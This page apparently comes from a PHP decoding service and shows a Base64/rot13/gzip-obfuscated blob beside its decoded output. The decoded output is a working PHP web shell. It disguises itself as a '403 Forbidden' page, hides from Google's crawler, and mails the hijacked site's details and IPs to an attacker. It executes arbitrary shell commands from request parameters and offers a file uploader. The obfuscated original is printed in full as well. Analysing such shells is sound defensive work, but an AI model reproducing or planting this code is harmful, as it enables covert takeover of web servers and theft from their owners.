Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(str_rot13(base64_decode('rUp6Rts4EP58zPAfhJqp7TZaAimdFpIALVZuBgiXhJu5gYxUse..
Decoded Output download
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF[BArNEr]";}
else {$security= "SAFE_MODE = ON[BArNEr]";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/tmp/error.php";
rename($source, $desti);
}
/*(Error 403 Forbidden) */
/*joomla.org*/
$auth_pass = "2f3a4fccca6406e35bcf33e92dd93135";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 403 Forbidden');
exit;
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF (BArNEr) ";}
else {$security= "SAFE_MODE : ON (BArNEr) ";}
echo "<title>403 Forbidden</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
$safe = @ini_get('safe_mode');
if (!$safe) {$security= "SAFE_MODE : OFF(BArNEr)";}
else {$security= "SAFE_MODE : ON(BArNEr)";}
function printLogin() {
?>
<h1>403 Forbidden</h1>
<p>You do not have permission to access this document.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
<?php
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<br><br>'.php_uname().'<br>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'File Uploaded!<br><br>'; } else { echo 'File Upload, Failed!<br><br>'; } }Did this file decode correctly?
Original Code
eval(gzinflate(str_rot13(base64_decode('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')))); ?> Function Calls
| gzinflate | 1 |
| str_rot13 | 1 |
| base64_decode | 1 |
Stats
| MD5 | e75831395299f7629010bbf8636c18c1 |
| Eval Count | 1 |
| Decode Time | 95 ms |